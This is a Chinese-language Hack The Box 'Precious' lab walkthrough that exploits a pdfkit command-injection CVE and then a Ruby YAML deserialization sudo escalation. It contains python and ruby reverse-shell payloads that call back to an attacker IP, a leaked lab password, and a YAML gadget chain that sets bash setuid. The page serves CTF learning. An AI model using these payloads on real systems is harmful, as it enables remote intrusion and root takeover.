-
-
[原创]HTB Precious (easy)
-
发表于: 2022-12-12 11:57
-
参考链接 :https://read.infos3c.net/hack-the-box-htb-writeup-precious
https://meowmeowattack.github.io/htb/precious/
只开着22和80
sudo vim etc/hosts 将precious.htb 写入后访问
网站提供将网页转换为PDF文件的服务,本地开个 服务器试一下
使用工具Exiftool检查文件的元数据
该文件是由PDF文档生成库pdfkitv0.8.6生成的。通过谷歌搜索,可以找到CVE-2022–25765
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
像是一个命令执行
使用shell模板制作一个shell
https://www.revshells.com/
https://github.com/Atsukoro1/PDFKitExploit/blob/master/exploit.sh
这是一个ruby的洞,python的打不了
没有权限访问flag
在ruby用户下发现.bundle中有config文件,在其中找到了henry的密码
"henry:Q3c1AqGHtoI0aXAYFH"
使用密码ssh链接靶机
使用 sudo -l 查看此用户运行什么,henry可以以root身份运行文件 update_depencies.rb
查看代码,发现它使用了易受到反序列化攻击的YAML.load
可参考:
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
示例代码
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
http://10.10.16.3:80/?name= `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.16.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`
http://10.10.16.3:80/?name= `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.16.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`
http://10.10.16.3/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.3",9001))'`
http://10.10.16.3/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.3",9001))'`
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::Package::TarReader
io: &1 !ruby/object:Net::BufferedIO
io: &1 !ruby/object:Gem::Package::TarReader::Entry
read: 0
header: "abc"
debug_output: &1 !ruby/object:Net::WriteAdapter
socket: &1 !ruby/object:Gem::RequestSet
sets: !ruby/object:Net::WriteAdapter
socket: !ruby/module 'Kernel'
method_id: :system
git_set: chmod +s /usr/bin/bash
method_id: :resolve
---
- !ruby/object:Gem::Installer
i: x
- !ruby/object:Gem::SpecFetcher
i: y
- !ruby/object:Gem::Requirement
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
